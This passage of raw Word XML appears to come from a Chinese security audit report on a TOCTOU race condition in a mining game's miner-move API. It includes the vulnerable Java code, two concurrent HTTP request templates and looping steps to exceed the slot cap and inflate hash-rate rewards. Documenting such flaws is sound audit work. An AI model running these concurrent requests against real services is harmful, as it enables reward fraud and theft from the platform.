      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 是一次普通 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，在并发场景下，两个并发事务可在各自快照中同时看到目标坑位为空；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="572"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两笔并发请求都通过检查后，分别将来自不同源坑位（slotIdA=1、slotIdA=2）的矿机更新到同一目标坑位（slotIdB=9），数据库中出现同一坑位拥有两条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录的状态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>关键后果链</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="573"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>TOCTOU 执行后，目标坑位（slotIdB=9）出现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>两个矿机记录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（均 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），原两个源坑位（slot=1、slot=2）同时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>被清空</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="574"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">用户由此多出 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1个净空闲坑位</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（原本只有 1 个空闲，现变为 2 个空闲）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="575"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者随即通过其他接口（如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>takeFromStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）将仓库中的矿机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>填入腾出的坑位</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，使实际部署矿机数超过系统设计上限（9 个）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="576"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>computeBaseTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndInStorage(userId, 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 查询</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>全部</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录并累加，双占坑位的矿机与新部署的矿机均被计入，导致 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 被虚高写入用户账户；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="577"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">矿力算法直接决定挖矿收益，算力虚增 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>实际获得的游戏代币/USDT 奖励超额</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="578"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>通过脚本循环执行上述流程（每轮净多出 1 个可部署坑位），仓库矿机越多则可无限制叠加部署数量。</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/api/miner/move</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → TokenAuthFilter（验证 Bearer Token，userId 从 token 注入，安全）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → SignAuthTestFilter（HMAC 签名 + nonce 防重放）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → MinerController.move（userId=@CurrentUserId，slotIdA/slotIdB 完全可控）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → MinerService.moveToSlot</w:t>
              <w:br/>
              <w:t xml:space="preserve">      → canPlaceInSlot（普通 SELECT，无行锁 → TOCTOU 窗口）</w:t>
              <w:br/>
              <w:t xml:space="preserve">      → findByUserIdAndSlotIdAndInStorage（普通 SELECT，无行锁）</w:t>
              <w:br/>
              <w:t xml:space="preserve">      → userMinerRepository.save（写入目标坑位 → 竞态写入同一 slot）</w:t>
              <w:br/>
              <w:t xml:space="preserve">      → recalcUserLevelAndHashRate</w:t>
              <w:br/>
              <w:t xml:space="preserve">          → computeBaseTotalHashRate</w:t>
              <w:br/>
              <w:t xml:space="preserve">              → findByUserIdAndInStorage（全量扫描 inStorage=0，双占坑位双倍计入）</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">          → 存储虚高的 currentTotalHashRate → 影响后续挖矿收益</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存在漏洞的代码（含关键调用链片段）：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MoveMinerForm 可控字段：</w:t>
              <w:br/>
              <w:t>//   Integer slotIdA;   ← 源坑位，攻击者控制（并发请求各填不同坑位）</w:t>
              <w:br/>
              <w:t>//   Integer slotIdB;   ← 目标坑位，两个并发请求填同一空闲坑位</w:t>
              <w:br/>
              <w:br/>
              <w:t>@PostMapping("/move")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;UserMiner&gt; move(@CurrentUserId Long userId, @RequestBody MoveMinerForm form) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success(minerService.moveToSlot(userId, form.getSlotIdA(), form.getSlotIdB())); // ← HTTP 可控入口</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 竞态点：MinerService.java – moveToSlot</w:t>
              <w:br/>
              <w:t>@Transactional  // ← Repeatable Read，SELECT 走快照，无法阻止并发同时读到"空"</w:t>
              <w:br/>
              <w:t>public UserMiner moveToSlot(Long userId, Integer slotIdA, Integer slotIdB) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!canPlaceInSlot(userId, slotIdB)) {   // ← 普通 SELECT 快照读，TOCTOU 检查点</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("目标坑位未解锁或已被占用");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserMiner miner = userMinerRepository</w:t>
              <w:br/>
              <w:t xml:space="preserve">        .findByUserIdAndSlotIdAndInStorage(userId, slotIdA, 0)  // ← 普通 SELECT 快照读</w:t>
              <w:br/>
              <w:t xml:space="preserve">        .orElseThrow(() -&gt; new IllegalArgumentException("源坑位无矿机"));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setSlotId(slotIdB);                          // ← 两个并发事务各自更新不同 miner 到同一 slotIdB</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userMinerRepository.save(miner);                   // ← 竞态写入：两条记录的 slotId 均被设为同一坑位</w:t>
              <w:br/>
              <w:t xml:space="preserve">    recalcUserLevelAndHashRate(userId);                 // ← 触发算力重算</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return miner;</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ canPlaceInSlot：无行锁保护</w:t>
              <w:br/>
              <w:t>public boolean canPlaceInSlot(Long userId, Integer slotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!isSlotUnlocked(userId, slotId)) return false;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return userMinerRepository</w:t>
              <w:br/>
              <w:t xml:space="preserve">        .findByUserIdAndSlotIdAndInStorage(userId, slotId, 0)  // ← 快照读，并发场景两个事务均见"空" → 均返回 true</w:t>
              <w:br/>
              <w:t xml:space="preserve">        .isEmpty();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>// ④ 算力累加点：computeBaseTota</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>lHashRate</w:t>
              <w:br/>
              <w:t>public BigDecimal computeBaseTotalHashRate(Long userId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    List&lt;UserMiner&gt; miners = userMinerRepository.findByUserIdAndInStorage(userId, 0); // ← 全量扫描 inStorage=0，双占坑位的两条记录均被返回</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return miners.stream()</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .map(m -&gt; { ... return base; })    // ← 每条记录（含同坑位的重复矿机）均参与算力计算</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .reduce(BigDecimal.ZERO, BigDecimal::add); // ← 算力总和虚高</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攻击者脚本并发发出以下两个请求（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>完全同时，建议用多线程/async 确保并发进入竞态窗口</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A（将 slot 1 的矿机移动到 slot 9）</w:t>
              <w:br/>
              <w:t>POST /api/miner/move HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target-host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者有效 Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;当前时间戳&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;随机 nonce-A&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;对应请求 A 的 HMAC 签名&gt;</w:t>
              <w:br/>
              <w:br/>
              <w:t>{"slotIdA": 1, "slotIdB": 9}</w:t>
              <w:br/>
              <w:br/>
              <w:t>---</w:t>
              <w:br/>
              <w:br/>
              <w:t>### 请求 B（将 slot 2 的矿机移动到 slot 9，与请求 A 同时发送）</w:t>
              <w:br/>
              <w:t>POST /api/miner/move HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target-host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者有效 Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;当前时间戳&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;随机 nonce-B&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;对应请求 B 的 HMAC 签名&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"slotIdA": 2, "slotIdB": 9}</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spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>前置条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：攻击者账户中 slots 1–8 已有矿机，slot 9 为空闲（已解锁），仓库中有待部署矿机。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="579"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>第一轮 TOCTOU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="580"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同时并发发送请求 A（slot 1 → slot 9）和请求 B（slot 2 → slot 9）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="581"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">利用 Repeatable Read 快照窗口，两个事务均通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>canPlaceInSlot(userId, 9) == true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="582"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>事务 A 将 MinerA.slotId 更新为 9，事务 B 将 MinerB.slotId 更新为 9；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="583"/>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 xml:space="preserve">：数据库中 slot 9 存在两条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录；slot 1、slot 2 变为空闲；净增 1 个空闲坑位（原 1 个 → 现 2 个）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="584"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>部署仓库矿机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="585"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>takeFromStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（或类似接口）将仓库中的矿机部署到腾出的 slot 1 和 slot 2；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="586"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：实际部署矿机数达到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，超出系统设计的最大值 9。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="587"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>算力核算</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">任意触发 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（如再次调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/miner/move</w:t>
      </w:r>
      <w:r>
        <w:rPr>
